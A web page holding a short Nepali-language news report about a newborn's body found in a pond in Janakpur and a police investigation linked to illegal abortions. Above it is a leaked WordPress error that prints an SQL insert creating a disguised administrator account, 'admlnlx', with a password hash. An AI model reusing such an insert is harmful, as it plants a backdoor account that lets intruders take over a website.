WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BjBDjLILZKz3S.BkaqZ2IvsaxtiCl2.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-08 09:04:17', '', 'admlnlx', 'admlnlx')
जनकपुर, फागुन ५-
जनकपुरको अंगराजसर पोखरीमा बिहीबार बिहान नवजात शिशुको शव भेटिएको छ। जनकपुर उप–महानगरपालिकाको वडा नं. १० स्थित उक्त पोखरीमा बिहान ८ बजे तैरिरहेको अवस्थामा नवजात शिशुको शव स्थानीयवासीले देखेपछि जानकी प्रहरीलाई खबर गरेका थिए।
प्रहरीले सो शिशुको शवलाई पानीबाट बाहिर निकाली जनकपुर अञ्चल अस्पतालमा परीक्षणको लागि पठाएको छ। प्रहरी नायब उपरीक्षक मनोज यादवले घटनाको विस्तृत अनुसन्धान भइरहेको जानकारी दिँदै शिशु फाल्ने व्यक्तिको खोजतलास भइरहेको बताए। जनकपुर अञ्चल अस्पताल वरिपरी रहेका निजी क्लिनिक तथा अस्पतालमा अवैध रुपमा गर्भपतन गराउने क्रम बढेसंगै नवजात शिशुहरु रंगभूमि मैदान र विभिन्न पोखरीमा पटक–पटक फ्याल्ने गरेको पाइएको छ।